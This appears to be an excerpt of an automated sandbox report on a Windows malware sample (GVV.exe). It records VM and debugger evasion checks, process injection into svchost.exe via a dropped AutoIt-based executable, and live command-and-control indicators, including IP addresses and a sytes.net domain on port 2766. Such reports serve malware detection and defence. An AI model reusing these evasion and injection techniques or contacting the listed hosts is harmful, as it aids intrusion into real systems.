Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040F7A7 Sleep,ExitProcess,5_2_0040F7A7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0040F7A7 Sleep,ExitProcess,15_2_0040F7A7
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
          Source: C:\Users\user\Desktop\GVV.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_0041A748
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_0041A748
          Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\svchost.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\GVV.exe | API coverage: 3.8 %
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | API coverage: 4.1 %
          Source: C:\Windows\SysWOW64\svchost.exe TID: 6184 | Thread sleep count: 43 > 30
          Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0017DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0017DBBE
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0014C2A2 FindFirstFileExW,0_2_0014C2A2
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_001868EE FindFirstFileW,FindClose,0_2_001868EE
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0018698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0018698F
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0017D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0017D076
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0017D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0017D3A9
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00189642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00189642
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0018979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0018979D
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00189B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00189B2B
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00185C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00185C97
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,4_2_004DDBBE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004AC2A2 FindFirstFileExW,4_2_004AC2A2
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E68EE FindFirstFileW,FindClose,4_2_004E68EE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,4_2_004E698F
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_004DD076
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_004DD3A9
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_004E9642
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_004E979D
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_004E9B2B
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004E5C97 FindFirstFileW,FindNextFileW,FindClose,4_2_004E5C97
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_00409253
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0041C291
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0040C34D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_00409665
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0044E879 FindFirstFileExA,5_2_0044E879
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_0040880C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040783C FindFirstFileW,FindNextFileW,5_2_0040783C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00419AF5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040BD37
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409253
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C291
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C34D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409665
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0044E879 FindFirstFileExA,15_2_0044E879
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_0040880C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0040783C FindFirstFileW,FindNextFileW,15_2_0040783C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419AF5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD37
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00407C97
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_001142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001142DE
          Source: Amcache.hve.9.dr | Binary or memory string: VMware
          Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.9.dr | Binary or memory string: vmci.syshbin
          Source: Amcache.hve.9.dr | Binary or memory string: VMware, Inc.
          Source: Amcache.hve.9.dr | Binary or memory string: VMware20,1hbin@
          Source: Amcache.hve.9.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.9.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.9.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.9.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
          Source: svchost.exe, 00000005.00000002.4072031610.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.4119768647.0000000002E67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490908673.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490805278.0000000002E67000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: Amcache.hve.9.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: svchost.exe, 00000005.00000002.4072003934.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(
          Source: Amcache.hve.9.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.9.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: wscript.exe, 0000000D.00000002.4082499964.000001E7162A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\AZR
          Source: Amcache.hve.9.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.9.dr | Binary or memory string: vmci.sys
          Source: Amcache.hve.9.dr | Binary or memory string: vmci.syshbin`
          Source: wscript.exe, 0000000D.00000002.4082499964.000001E7162A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61c+'d
          Source: Amcache.hve.9.dr | Binary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.9.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.9.dr | Binary or memory string: VMware20,1
          Source: Amcache.hve.9.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.9.dr | Binary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.9.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.9.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.9.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.9.dr | Binary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.9.dr | Binary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual RAM
          Source: Amcache.hve.9.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.9.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Windows\SysWOW64\svchost.exe | API call chain: ExitProcess graph end node
          Source: C:\Windows\SysWOW64\svchost.exe | API call chain: ExitProcess graph end node
          Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0018EAA2 BlockInput,0_2_0018EAA2
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00142622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00142622
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_001142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001142DE
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00134CE8 mov eax, dword ptr fs:[00000030h] 0_2_00134CE8
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_01A83580 mov eax, dword ptr fs:[00000030h] 0_2_01A83580
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_01A83520 mov eax, dword ptr fs:[00000030h] 0_2_01A83520
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_01A81F00 mov eax, dword ptr fs:[00000030h] 0_2_01A81F00
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_00494CE8 mov eax, dword ptr fs:[00000030h] 4_2_00494CE8
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_01783520 mov eax, dword ptr fs:[00000030h] 4_2_01783520
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_01783580 mov eax, dword ptr fs:[00000030h] 4_2_01783580
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_01781F00 mov eax, dword ptr fs:[00000030h] 4_2_01781F00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_004432B5 mov eax, dword ptr fs:[00000030h] 5_2_004432B5
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 14_2_01573580 mov eax, dword ptr fs:[00000030h] 14_2_01573580
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 14_2_01571F00 mov eax, dword ptr fs:[00000030h] 14_2_01571F00
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 14_2_01573520 mov eax, dword ptr fs:[00000030h] 14_2_01573520
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_004432B5 mov eax, dword ptr fs:[00000030h] 15_2_004432B5
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00170B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00170B62
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00142622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00142622
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0013083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0013083F
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_001309D5 SetUnhandledExceptionFilter,0_2_001309D5
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00130C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00130C21
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004A2622
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_0049083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0049083F
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004909D5 SetUnhandledExceptionFilter,4_2_004909D5
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_00490C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00490C21
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_004349F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00434B47 SetUnhandledExceptionFilter,5_2_00434B47
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0043BB22
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00434FDC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004349F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_00434B47 SetUnhandledExceptionFilter,15_2_00434B47
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043BB22
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00434FDC

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 23.94.53.100 2766
          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 178.237.33.50 80
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2944008
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2873008
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 5_2_004120F7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 15_2_004120F7
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00171201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00171201
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00152BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00152BA5
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0017B226 SendInput,keybd_event,0_2_0017B226
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_001922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_001922DA
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\GVV.exe"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00170B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00170B62
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00171663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00171663
          Source: GVV.exe, deblaterate.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: svchost.exe, 00000005.00000002.4072003934.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490784851.0000000002E31000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
          Source: GVV.exe, deblaterate.exe | Binary or memory string: Shell_TrayWnd
          Source: svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerOS\
          Source: svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: yuahdgbceja.sytes.net:2766:1Program Managerhttp://geoplugin.net/json.gp
          Source: svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerOS\cf
          Source: svchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4072003934.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
